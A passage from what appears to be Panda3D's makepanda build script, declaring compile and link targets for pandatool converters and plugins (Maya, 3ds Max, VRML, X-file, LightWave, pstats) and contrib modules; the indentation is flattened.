TargetAdd('egg2flt.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2flt.exe', opts=['ADVAPI'])
TargetAdd('flt2egg_fltToEgg.obj', opts=OPTS, input='fltToEgg.cxx')
TargetAdd('flt2egg.exe', input='flt2egg_fltToEgg.obj')
TargetAdd('flt2egg.exe', input='libp3flt.lib')
TargetAdd('flt2egg.exe', input='libp3fltegg.lib')
TargetAdd('flt2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('flt2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/imagebase/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/imagebase']
TargetAdd('p3imagebase_composite1.obj', opts=OPTS, input='p3imagebase_composite1.cxx')
TargetAdd('libp3imagebase.lib', input='p3imagebase_composite1.obj')
#
# DIRECTORY: pandatool/src/imageprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/imageprogs']
TargetAdd('image-info_imageInfo.obj', opts=OPTS, input='imageInfo.cxx')
TargetAdd('image-info.exe', input='image-info_imageInfo.obj')
TargetAdd('image-info.exe', input='libp3imagebase.lib')
TargetAdd('image-info.exe', input='libp3progbase.lib')
TargetAdd('image-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-info.exe', opts=['ADVAPI'])
TargetAdd('image-resize_imageResize.obj', opts=OPTS, input='imageResize.cxx')
TargetAdd('image-resize.exe', input='image-resize_imageResize.obj')
TargetAdd('image-resize.exe', input='libp3imagebase.lib')
TargetAdd('image-resize.exe', input='libp3progbase.lib')
TargetAdd('image-resize.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-resize.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-resize.exe', opts=['ADVAPI'])
TargetAdd('image-trans_imageTrans.obj', opts=OPTS, input='imageTrans.cxx')
TargetAdd('image-trans.exe', input='image-trans_imageTrans.obj')
TargetAdd('image-trans.exe', input='libp3imagebase.lib')
TargetAdd('image-trans.exe', input='libp3progbase.lib')
TargetAdd('image-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-trans.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/pfmprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/pfmprogs']
TargetAdd('pfm-trans_pfmTrans.obj', opts=OPTS, input='pfmTrans.cxx')
TargetAdd('pfm-trans.exe', input='pfm-trans_pfmTrans.obj')
TargetAdd('pfm-trans.exe', input='libp3progbase.lib')
TargetAdd('pfm-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('pfm-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pfm-trans.exe', opts=['ADVAPI'])
TargetAdd('pfm-bba_pfmBba.obj', opts=OPTS, input='pfmBba.cxx')
TargetAdd('pfm-bba_config_pfmprogs.obj', opts=OPTS, input='config_pfmprogs.cxx')
TargetAdd('pfm-bba.exe', input='pfm-bba_pfmBba.obj')
TargetAdd('pfm-bba.exe', input='pfm-bba_config_pfmprogs.obj')
TargetAdd('pfm-bba.exe', input='libp3progbase.lib')
TargetAdd('pfm-bba.exe', input='libp3pandatoolbase.lib')
TargetAdd('pfm-bba.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pfm-bba.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/lwo/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/lwo']
TargetAdd('p3lwo_composite1.obj', opts=OPTS, input='p3lwo_composite1.cxx')
TargetAdd('libp3lwo.lib', input='p3lwo_composite1.obj')
#
# DIRECTORY: pandatool/src/lwoegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/lwoegg']
TargetAdd('p3lwoegg_composite1.obj', opts=OPTS, input='p3lwoegg_composite1.cxx')
TargetAdd('libp3lwoegg.lib', input='p3lwoegg_composite1.obj')
#
# DIRECTORY: pandatool/src/lwoprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/lwoprogs', 'DIR:pandatool/src/lwo']
TargetAdd('lwo-scan_lwoScan.obj', opts=OPTS, input='lwoScan.cxx')
TargetAdd('lwo-scan.exe', input='lwo-scan_lwoScan.obj')
TargetAdd('lwo-scan.exe', input='libp3lwo.lib')
TargetAdd('lwo-scan.exe', input='libp3progbase.lib')
TargetAdd('lwo-scan.exe', input='libp3pandatoolbase.lib')
TargetAdd('lwo-scan.exe', input=COMMON_PANDA_LIBS)
TargetAdd('lwo-scan.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('lwo2egg_lwoToEgg.obj', opts=OPTS, input='lwoToEgg.cxx')
TargetAdd('lwo2egg.exe', input='lwo2egg_lwoToEgg.obj')
TargetAdd('lwo2egg.exe', input='libp3lwo.lib')
TargetAdd('lwo2egg.exe', input='libp3lwoegg.lib')
TargetAdd('lwo2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('lwo2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/maya/
#
for VER in MAYAVERSIONS:
VNUM=VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/maya', VER]
TargetAdd('maya'+VNUM+'_composite1.obj', opts=OPTS, input='p3maya_composite1.cxx')
TargetAdd('libmaya'+VNUM+'.lib', input='maya'+VNUM+'_composite1.obj')
#
# DIRECTORY: pandatool/src/mayaegg/
#
for VER in MAYAVERSIONS:
VNUM=VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/mayaegg', 'DIR:pandatool/src/maya', VER]
TargetAdd('mayaegg'+VNUM+'_loader.obj', opts=OPTS, input='mayaEggLoader.cxx')
TargetAdd('mayaegg'+VNUM+'_composite1.obj', opts=OPTS, input='p3mayaegg_composite1.cxx')
TargetAdd('libmayaegg'+VNUM+'.lib', input='mayaegg'+VNUM+'_loader.obj')
TargetAdd('libmayaegg'+VNUM+'.lib', input='mayaegg'+VNUM+'_composite1.obj')
#
# DIRECTORY: pandatool/src/maxegg/
#
for VER in MAXVERSIONS:
VNUM=VER[3:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/maxegg', VER, "WINCOMCTL", "WINCOMDLG", "WINUSER", "MSFORSCOPE", "RTTI"]
TargetAdd('maxEgg'+VNUM+'.res', opts=OPTS, input='maxEgg.rc')
TargetAdd('maxegg'+VNUM+'_loader.obj', opts=OPTS, input='maxEggLoader.cxx')
TargetAdd('maxegg'+VNUM+'_composite1.obj', opts=OPTS, input='p3maxegg_composite1.cxx')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxegg'+VNUM+'_composite1.obj')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxEgg'+VNUM+'.res')
TargetAdd('maxegg'+VNUM+'.dlo', input='maxEgg.def', ipath=OPTS)
TargetAdd('maxegg'+VNUM+'.dlo', input=COMMON_EGG2X_LIBS)
TargetAdd('maxegg'+VNUM+'.dlo', opts=OPTS)
#
# DIRECTORY: pandatool/src/maxprogs/
#
for VER in MAXVERSIONS:
VNUM=VER[3:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/maxprogs', VER, "WINCOMCTL", "WINCOMDLG", "WINUSER", "MSFORSCOPE", "RTTI"]
TargetAdd('maxImportRes.res', opts=OPTS, input='maxImportRes.rc')
TargetAdd('maxprogs'+VNUM+'_maxeggimport.obj', opts=OPTS, input='maxEggImport.cxx')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxegg'+VNUM+'_loader.obj')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxprogs'+VNUM+'_maxeggimport.obj')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpandaegg.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpanda.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='libpandaexpress.dll')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxImportRes.res')
TargetAdd('maxeggimport'+VNUM+'.dle', input='maxEggImport.def', ipath=OPTS)
TargetAdd('maxeggimport'+VNUM+'.dle', input=COMMON_DTOOL_LIBS)
TargetAdd('maxeggimport'+VNUM+'.dle', opts=OPTS)
#
# DIRECTORY: pandatool/src/vrml/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/vrml', 'ZLIB', 'BISONPREFIX_vrmlyy']
CreateFile(GetOutputDir()+"/include/vrmlParser.h")
TargetAdd('p3vrml_vrmlParser.obj', opts=OPTS, input='vrmlParser.yxx')
TargetAdd('vrmlParser.h', input='p3vrml_vrmlParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3vrml_vrmlLexer.obj', opts=OPTS, input='vrmlLexer.lxx')
TargetAdd('p3vrml_parse_vrml.obj', opts=OPTS, input='parse_vrml.cxx')
TargetAdd('p3vrml_standard_nodes.obj', opts=OPTS, input='standard_nodes.cxx')
TargetAdd('p3vrml_vrmlNode.obj', opts=OPTS, input='vrmlNode.cxx')
TargetAdd('p3vrml_vrmlNodeType.obj', opts=OPTS, input='vrmlNodeType.cxx')
TargetAdd('libp3vrml.lib', input='p3vrml_parse_vrml.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_standard_nodes.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlNode.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlNodeType.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlParser.obj')
TargetAdd('libp3vrml.lib', input='p3vrml_vrmlLexer.obj')
#
# DIRECTORY: pandatool/src/vrmlegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/vrmlegg', 'DIR:pandatool/src/vrml']
TargetAdd('p3vrmlegg_indexedFaceSet.obj', opts=OPTS, input='indexedFaceSet.cxx')
TargetAdd('p3vrmlegg_vrmlAppearance.obj', opts=OPTS, input='vrmlAppearance.cxx')
TargetAdd('p3vrmlegg_vrmlToEggConverter.obj', opts=OPTS, input='vrmlToEggConverter.cxx')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_indexedFaceSet.obj')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_vrmlAppearance.obj')
TargetAdd('libp3vrmlegg.lib', input='p3vrmlegg_vrmlToEggConverter.obj')
#
# DIRECTORY: pandatool/src/xfile/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/xfile', 'ZLIB', 'BISONPREFIX_xyy', 'FLEXDASHI']
CreateFile(GetOutputDir()+"/include/xParser.h")
TargetAdd('p3xfile_xParser.obj', opts=OPTS, input='xParser.yxx')
TargetAdd('xParser.h', input='p3xfile_xParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3xfile_xLexer.obj', opts=OPTS, input='xLexer.lxx')
TargetAdd('p3xfile_composite1.obj', opts=OPTS, input='p3xfile_composite1.cxx')
TargetAdd('libp3xfile.lib', input='p3xfile_composite1.obj')
TargetAdd('libp3xfile.lib', input='p3xfile_xParser.obj')
TargetAdd('libp3xfile.lib', input='p3xfile_xLexer.obj')
#
# DIRECTORY: pandatool/src/xfileegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/xfileegg', 'DIR:pandatool/src/xfile']
TargetAdd('p3xfileegg_composite1.obj', opts=OPTS, input='p3xfileegg_composite1.cxx')
TargetAdd('libp3xfileegg.lib', input='p3xfileegg_composite1.obj')
#
# DIRECTORY: pandatool/src/ptloader/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
if not PkgSkip("FCOLLADA"):
DefSymbol("FCOLLADA", "HAVE_FCOLLADA")
OPTS=['DIR:pandatool/src/ptloader', 'DIR:pandatool/src/flt', 'DIR:pandatool/src/lwo', 'DIR:pandatool/src/xfile', 'DIR:pandatool/src/xfileegg', 'DIR:pandatool/src/daeegg', 'BUILDING:PTLOADER', 'FCOLLADA']
TargetAdd('p3ptloader_config_ptloader.obj', opts=OPTS, input='config_ptloader.cxx', dep='dtool_have_fcollada.dat')
TargetAdd('p3ptloader_loaderFileTypePandatool.obj', opts=OPTS, input='loaderFileTypePandatool.cxx')
TargetAdd('libp3ptloader.dll', input='p3ptloader_config_ptloader.obj')
TargetAdd('libp3ptloader.dll', input='p3ptloader_loaderFileTypePandatool.obj')
TargetAdd('libp3ptloader.dll', input='libp3fltegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3flt.lib')
TargetAdd('libp3ptloader.dll', input='libp3lwoegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3lwo.lib')
TargetAdd('libp3ptloader.dll', input='libp3dxfegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3dxf.lib')
TargetAdd('libp3ptloader.dll', input='libp3objegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3vrmlegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3vrml.lib')
TargetAdd('libp3ptloader.dll', input='libp3xfileegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3xfile.lib')
if (PkgSkip("FCOLLADA")==0): TargetAdd('libp3ptloader.dll', input='libp3daeegg.lib')
TargetAdd('libp3ptloader.dll', input='libp3eggbase.lib')
TargetAdd('libp3ptloader.dll', input='libp3progbase.lib')
TargetAdd('libp3ptloader.dll', input='libp3converter.lib')
TargetAdd('libp3ptloader.dll', input='libp3pandatoolbase.lib')
TargetAdd('libp3ptloader.dll', input='libpandaegg.dll')
TargetAdd('libp3ptloader.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3ptloader.dll', opts=['MODULE', 'ADVAPI', 'FCOLLADA', 'WINUSER'])
#
# DIRECTORY: pandatool/src/miscprogs/
#
# This is a bit of an esoteric tool, and it causes issues because
# it conflicts with tools of the same name in different packages.
#if (PkgSkip("PANDATOOL")==0):
# OPTS=['DIR:pandatool/src/miscprogs']
# TargetAdd('bin2c_binToC.obj', opts=OPTS, input='binToC.cxx')
# TargetAdd('bin2c.exe', input='bin2c_binToC.obj')
# TargetAdd('bin2c.exe', input='libp3progbase.lib')
# TargetAdd('bin2c.exe', input='libp3pandatoolbase.lib')
# TargetAdd('bin2c.exe', input=COMMON_PANDA_LIBS)
# TargetAdd('bin2c.exe', input='libp3pystub.lib')
# TargetAdd('bin2c.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/pstatserver/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/pstatserver']
TargetAdd('p3pstatserver_composite1.obj', opts=OPTS, input='p3pstatserver_composite1.cxx')
TargetAdd('libp3pstatserver.lib', input='p3pstatserver_composite1.obj')
#
# DIRECTORY: pandatool/src/softprogs/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/softprogs', 'OPENSSL']
TargetAdd('softcvs_softCVS.obj', opts=OPTS, input='softCVS.cxx')
TargetAdd('softcvs_softFilename.obj', opts=OPTS, input='softFilename.cxx')
TargetAdd('softcvs.exe', input='softcvs_softCVS.obj')
TargetAdd('softcvs.exe', input='softcvs_softFilename.obj')
TargetAdd('softcvs.exe', input='libp3progbase.lib')
TargetAdd('softcvs.exe', input='libp3pandatoolbase.lib')
TargetAdd('softcvs.exe', input=COMMON_PANDA_LIBS)
TargetAdd('softcvs.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/text-stats/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/text-stats']
TargetAdd('text-stats_textMonitor.obj', opts=OPTS, input='textMonitor.cxx')
TargetAdd('text-stats_textStats.obj', opts=OPTS, input='textStats.cxx')
TargetAdd('text-stats.exe', input='text-stats_textMonitor.obj')
TargetAdd('text-stats.exe', input='text-stats_textStats.obj')
TargetAdd('text-stats.exe', input='libp3progbase.lib')
TargetAdd('text-stats.exe', input='libp3pstatserver.lib')
TargetAdd('text-stats.exe', input='libp3pandatoolbase.lib')
TargetAdd('text-stats.exe', input=COMMON_PANDA_LIBS)
TargetAdd('text-stats.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/vrmlprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/vrmlprogs', 'DIR:pandatool/src/vrml', 'DIR:pandatool/src/vrmlegg']
TargetAdd('vrml-trans_vrmlTrans.obj', opts=OPTS, input='vrmlTrans.cxx')
TargetAdd('vrml-trans.exe', input='vrml-trans_vrmlTrans.obj')
TargetAdd('vrml-trans.exe', input='libp3vrml.lib')
TargetAdd('vrml-trans.exe', input='libp3progbase.lib')
TargetAdd('vrml-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('vrml-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('vrml-trans.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('vrml2egg_vrmlToEgg.obj', opts=OPTS, input='vrmlToEgg.cxx')
TargetAdd('vrml2egg.exe', input='vrml2egg_vrmlToEgg.obj')
TargetAdd('vrml2egg.exe', input='libp3vrmlegg.lib')
TargetAdd('vrml2egg.exe', input='libp3vrml.lib')
TargetAdd('vrml2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('vrml2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/win-stats/
# DIRECTORY: pandatool/src/gtk-stats/
#
if (PkgSkip("PANDATOOL")==0 and (GetTarget() == 'windows' or PkgSkip("GTK2")==0)):
if GetTarget() == 'windows':
OPTS=['DIR:pandatool/src/win-stats']
TargetAdd('pstats_composite1.obj', opts=OPTS, input='winstats_composite1.cxx')
else:
OPTS=['DIR:pandatool/src/gtk-stats', 'GTK2']
TargetAdd('pstats_composite1.obj', opts=OPTS, input='gtkstats_composite1.cxx')
TargetAdd('pstats.exe', input='pstats_composite1.obj')
TargetAdd('pstats.exe', input='libp3pstatserver.lib')
TargetAdd('pstats.exe', input='libp3progbase.lib')
TargetAdd('pstats.exe', input='libp3pandatoolbase.lib')
TargetAdd('pstats.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pstats.exe', opts=['SUBSYSTEM:WINDOWS', 'WINSOCK', 'WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM', 'GTK2'])
#
# DIRECTORY: pandatool/src/xfileprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/xfileprogs', 'DIR:pandatool/src/xfile', 'DIR:pandatool/src/xfileegg']
TargetAdd('x-trans_xFileTrans.obj', opts=OPTS, input='xFileTrans.cxx')
TargetAdd('x-trans.exe', input='x-trans_xFileTrans.obj')
TargetAdd('x-trans.exe', input='libp3progbase.lib')
TargetAdd('x-trans.exe', input='libp3xfile.lib')
TargetAdd('x-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('x-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('x-trans.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('egg2x_eggToX.obj', opts=OPTS, input='eggToX.cxx')
TargetAdd('egg2x.exe', input='egg2x_eggToX.obj')
TargetAdd('egg2x.exe', input='libp3xfileegg.lib')
TargetAdd('egg2x.exe', input='libp3xfile.lib')
TargetAdd('egg2x.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2x.exe', opts=['ADVAPI'])
TargetAdd('x2egg_xFileToEgg.obj', opts=OPTS, input='xFileToEgg.cxx')
TargetAdd('x2egg.exe', input='x2egg_xFileToEgg.obj')
TargetAdd('x2egg.exe', input='libp3xfileegg.lib')
TargetAdd('x2egg.exe', input='libp3xfile.lib')
TargetAdd('x2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('x2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/mayaprogs/
#
for VER in MAYAVERSIONS:
VNUM = VER[4:]
if not PkgSkip(VER) and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
if GetTarget() == 'darwin' and int(VNUM) >= 2012:
ARCH_OPTS = ['NOARCH:PPC', 'NOARCH:I386']
if len(OSX_ARCHS) != 0 and 'x86_64' not in OSX_ARCHS:
continue
elif GetTarget() == 'darwin' and int(VNUM) >= 2009:
ARCH_OPTS = ['NOARCH:PPC']
elif GetTarget() == 'darwin':
ARCH_OPTS = ['NOARCH:X86_64']
else:
ARCH_OPTS = []
OPTS=['DIR:pandatool/src/mayaprogs', 'DIR:pandatool/src/maya', 'DIR:pandatool/src/mayaegg', 'DIR:pandatool/src/cvscopy', 'BUILDING:MISC', VER] + ARCH_OPTS
TargetAdd('mayaeggimport'+VNUM+'_mayaeggimport.obj', opts=OPTS, input='mayaEggImport.cxx')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='mayaegg'+VNUM+'_loader.obj')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='mayaeggimport'+VNUM+'_mayaeggimport.obj')
TargetAdd('mayaeggimport'+VNUM+'.mll', input='libpandaegg.dll')
TargetAdd('mayaeggimport'+VNUM+'.mll', input=COMMON_PANDA_LIBS)
#if GetTarget() == 'windows':
# TargetAdd('mayaeggimport'+VNUM+'.mll', input='libp3pystub.lib')
TargetAdd('mayaeggimport'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayaloader'+VNUM+'_config_mayaloader.obj', opts=OPTS, input='config_mayaloader.cxx')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='mayaloader'+VNUM+'_config_mayaloader.obj')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libmayaegg'+VNUM+'.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3ptloader.dll')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libmaya'+VNUM+'.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3fltegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3flt.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3lwoegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3lwo.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3dxfegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3dxf.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3objegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3vrmlegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3vrml.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3xfileegg.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3xfile.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3eggbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3progbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3converter.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libp3pandatoolbase.lib')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input='libpandaegg.dll')
TargetAdd('libp3mayaloader'+VNUM+'.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3mayaloader'+VNUM+'.dll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayapview'+VNUM+'_mayaPview.obj', opts=OPTS, input='mayaPview.cxx')
TargetAdd('libmayapview'+VNUM+'.mll', input='mayapview'+VNUM+'_mayaPview.obj')
TargetAdd('libmayapview'+VNUM+'.mll', input='libmayaegg'+VNUM+'.lib')
TargetAdd('libmayapview'+VNUM+'.mll', input='libmaya'+VNUM+'.lib')
TargetAdd('libmayapview'+VNUM+'.mll', input='libp3framework.dll')
TargetAdd('libmayapview'+VNUM+'.mll', input=COMMON_EGG2X_LIBS)
TargetAdd('libmayapview'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('maya2egg'+VNUM+'_mayaToEgg.obj', opts=OPTS, input='mayaToEgg.cxx')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='maya2egg'+VNUM+'_mayaToEgg.obj')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='libmayaegg'+VNUM+'.lib')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
TargetAdd('maya2egg'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('maya2egg'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('egg2maya'+VNUM+'_eggToMaya.obj', opts=OPTS, input='eggToMaya.cxx')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='egg2maya'+VNUM+'_eggToMaya.obj')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='libmayaegg'+VNUM+'.lib')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
TargetAdd('egg2maya'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2maya'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayacopy'+VNUM+'_mayaCopy.obj', opts=OPTS, input='mayaCopy.cxx')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='mayacopy'+VNUM+'_mayaCopy.obj')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='libp3cvscopy.lib')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input='libmaya'+VNUM+'.lib')
TargetAdd('mayacopy'+VNUM+'_bin.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('mayacopy'+VNUM+'_bin.exe', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayasavepview'+VNUM+'_mayaSavePview.obj', opts=OPTS, input='mayaSavePview.cxx')
TargetAdd('libmayasavepview'+VNUM+'.mll', input='mayasavepview'+VNUM+'_mayaSavePview.obj')
TargetAdd('libmayasavepview'+VNUM+'.mll', opts=['ADVAPI', VER]+ARCH_OPTS)
TargetAdd('mayapath'+VNUM+'.obj', opts=OPTS, input='mayapath.cxx')
TargetAdd('maya2egg'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('maya2egg'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('maya2egg'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('maya2egg'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
TargetAdd('egg2maya'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('egg2maya'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('egg2maya'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('egg2maya'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
TargetAdd('mayacopy'+VNUM+'.exe', input='mayapath'+VNUM+'.obj')
TargetAdd('mayacopy'+VNUM+'.exe', input='libpandaexpress.dll')
TargetAdd('mayacopy'+VNUM+'.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('mayacopy'+VNUM+'.exe', opts=['ADVAPI']+ARCH_OPTS)
#
# DIRECTORY: contrib/src/ai/
#
if (PkgSkip("CONTRIB")==0 and not RUNTIME):
OPTS=['DIR:contrib/src/ai', 'BUILDING:PANDAAI']
TargetAdd('p3ai_composite1.obj', opts=OPTS, input='p3ai_composite1.cxx')
TargetAdd('libpandaai.dll', input='p3ai_composite1.obj')
TargetAdd('libpandaai.dll', input=COMMON_PANDA_LIBS)
OPTS=['DIR:contrib/src/ai', 'PYTHON']
IGATEFILES=GetDirectoryContents('contrib/src/ai', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaai.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaai.in', opts=['IMOD:panda3d.ai', 'ILIB:libpandaai', 'SRCDIR:contrib/src/ai'])
TargetAdd('libpandaai_igate.obj', input='libpandaai.in', opts=["DEPENDENCYONLY"])
TargetAdd('ai_module.obj', input='libpandaai.in')
TargetAdd('ai_module.obj', opts=OPTS)
TargetAdd('ai_module.obj', opts=['IMOD:panda3d.ai', 'ILIB:ai', 'IMPORT:panda3d.core'])
TargetAdd('ai.pyd', input='ai_module.obj')
TargetAdd('ai.pyd', input='libpandaai_igate.obj')
TargetAdd('ai.pyd', input='libpandaai.dll')
TargetAdd('ai.pyd', input='libp3interrogatedb.dll')
TargetAdd('ai.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('ai.pyd', opts=['PYTHON'])
#
# DIRECTORY: contrib/src/rplight/
#
if not PkgSkip("CONTRIB") and not PkgSkip("PYTHON") and not RUNTIME:
OPTS=['DIR:contrib/src/rplight', 'BUILDING:RPLIGHT', 'PYTHON']
TargetAdd('p3rplight_composite1.obj', opts=OPTS, input='p3rplight_composite1.cxx')
IGATEFILES=GetDirectoryContents('contrib/src/rplight', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3rplight.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3rplight.in', opts=['IMOD:panda3d._rplight', 'ILIB:libp3rplight', 'SRCDIR:contrib/src/rplight'])
TargetAdd('libp3rplight_igate.obj', input='libp3rplight.in', opts=["DEPENDENCYONLY"])
TargetAdd('rplight_module.obj', input='libp3rplight.in')
TargetAdd('rplight_module.obj', opts=OPTS)
TargetAdd('rplight_module.obj', opts=['IMOD:panda3d._rplight', 'ILIB:_rplight', 'IMPORT:panda3d.core'])
TargetAdd('_rplight.pyd', input='rplight_module.obj')
